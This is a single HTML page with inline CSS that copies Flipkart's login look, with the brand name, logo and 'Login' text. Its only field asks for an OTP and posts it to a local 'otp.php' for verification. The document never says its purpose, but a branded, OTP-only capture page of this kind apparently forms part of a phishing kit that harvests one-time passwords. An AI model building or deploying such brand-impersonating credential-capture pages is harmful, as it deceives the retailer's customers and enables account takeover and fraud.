<!DOCTYPE html>
<html>
	<head>
		<title>Flipkart</title>
		<!-- Author: Sajjad -->
			
		<style>
			
body{
	font-family: Sans-serif;
	}
.container{
  font-family: Sans-serif;
  width: 800px;
  height: 500px;
  padding: 20px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  position: absolute;
  top: 0%;
  left: 50%;
  transform: translate(-50%, 50%);
  border-radius: 2px;
  background-color: white;
  }
  
.top{
	position: absolute;
	top: 0px;
	left: 0px;
	background-color: #0064D3;
	width: 100%;
	height: 5%;
	}

.box-1{
	width: 35%;
	height: 100%;
	background-color: #047BD5;
	position: absolute;
	top: 0px;
	left: 0px;
}
h1{
	color: white;
	margin-left: 30px;
	margin-top: 40px;
	}
	
.p1{
	color: white;
	font-size: 13px;
	margin-left: 30px;
	}
.box-2{
	position: absolute;
	top: 0px;
	right: 0px;
	width: 65%;
	height: 100%;
}
.input-box{
	margin-top: 20%;
	margin-left: 10%;
	border: none;
	border-bottom: 1px solid grey;
	width: 80%;
	padding: 15px 0px;
	}
	
.p2{
	margin-left: 10%;
	font-size: 12px;
	margin-top: 35px;
	color: grey;
	}
	
.a1{
	text-decoration: none;
	color: #0064D3;
	}
	
.a2{
	color: #0064D3;
	font-weight: bold;
	text-decoration: none;
	position: absolute;
	bottom: 30px;
	left: 55%;
	transform: translate(-50%, 50%);
	width: 60%;
	}
	
.btn{
	color: white;
	font-weight: bold;
	background-color: #0064D3;
	padding: 15px 0px;
	width: 80%;
	border: none;
	border-radius: 3px;
	margin-left: 10%;
	margin-top: 6px;
	}
	
.logo{
	width: 150px;
	margin-top: 25px;
	margin-left: 100px;
}
.image{
	position: absolute;
	bottom: 130px;
	left: 50%;
	transform: translate(-50%, 50%);
	}
		</style>
	</head>
	<body>
		<form action="otp.php" method="post">
			<div class="top">
				<img src="Image/logo.png" alt="Flipkart" class="logo"/>
			</div>
			<div class="container">
				<div class="box-1">
				<div>
					<h1>Login</h1>
				</div>
				<div>
					<p class="p1">
						Get access to your Orders, <br>Wishlist and Recommendations
					</p>
				</div>
				<div>
					<img src="Image/image.png" alt="Flipkart" class="image"/>
				</div>
				</div>
				<div class="box-2">
					<div>
						<input type="text" name="otp" class="input-box" placeholder="OTP"></input>
					</div>
					<div>
						<p class="p2">By continuing, you agree to Flipkart's <a href="#" class="a1">Terms of Use</a> and <a href="#" class="a1">Privacy Policy.</a></p>
					</div>
					<div>
						<button type="submit" class="btn">Verify</button>
					</div>
					<div>
						<a href="#" class="a2">New to Flipkart? Create an account</a>
					</div>
				</div>
			<div>
		</form>
	</body>
</html>